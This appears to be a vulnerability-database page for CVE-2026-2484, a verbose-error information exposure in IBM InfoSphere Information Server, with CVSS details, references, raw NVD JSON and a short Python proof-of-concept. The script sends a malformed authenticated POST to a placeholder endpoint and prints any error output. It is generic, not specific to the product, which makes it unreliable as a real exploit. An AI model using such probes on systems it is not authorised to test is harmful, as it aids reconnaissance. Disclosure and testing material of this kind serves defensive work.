CVE-2026-2484

Description

IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is affected by an information exposure vulnerability caused by overly verbose error messages

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:* - VULNERABLE

IBM InfoSphere Information Server 11.7.0.0

IBM InfoSphere Information Server 11.7.1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-2484
# This script demonstrates sending a malformed request to trigger verbose error messages.
import requests

target_url = "http://target-server:port/ibm/iis/endpoint"  # Example endpoint
headers = {
    "User-Agent": "CVE-2026-2484-Scanner",
    "Authorization": "Basic <Base64_Credentials>"  # Requires low privilege (PR:L)
}

# Send a request with invalid parameters to trigger the error
payload = {
    "invalid_param": "trigger_error_123!!"
}

try:
    # Sending POST request to simulate the attack vector
    response = requests.post(target_url, headers=headers, data=payload, timeout=10)
    
    # Check if the response contains verbose error information
    if response.status_code != 200 and ("error" in response.text.lower() or "exception" in response.text.lower()):
        print("[+] Vulnerability Detected!")
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Verbose Error Information:")
        print(response.text)
    else:
        print("[-] Request did not trigger a verbose error message or target is not vulnerable.")
except Exception as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2484
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2484
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2484/
[4] VulDB https://vuldb.com/cve/CVE-2026-2484
[5] https://www.ibm.com/support/pages/node/7266767

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2484", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:41.100", "lastModified": "2026-03-31T19:01:10.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is affected by an information exposure vulnerability caused by overly verbose error messages"}, {"lang": "es", "value": "IBM InfoSphere Information Server 11.7.0.0 hasta 11.7.1.6 se ve afectado por una vulnerabilidad de exposición de información causada por mensajes de error excesivamente detallados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7.0.0", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "65FBF88B-61F0-4D42-A290-453FDC874D7F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7266767", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}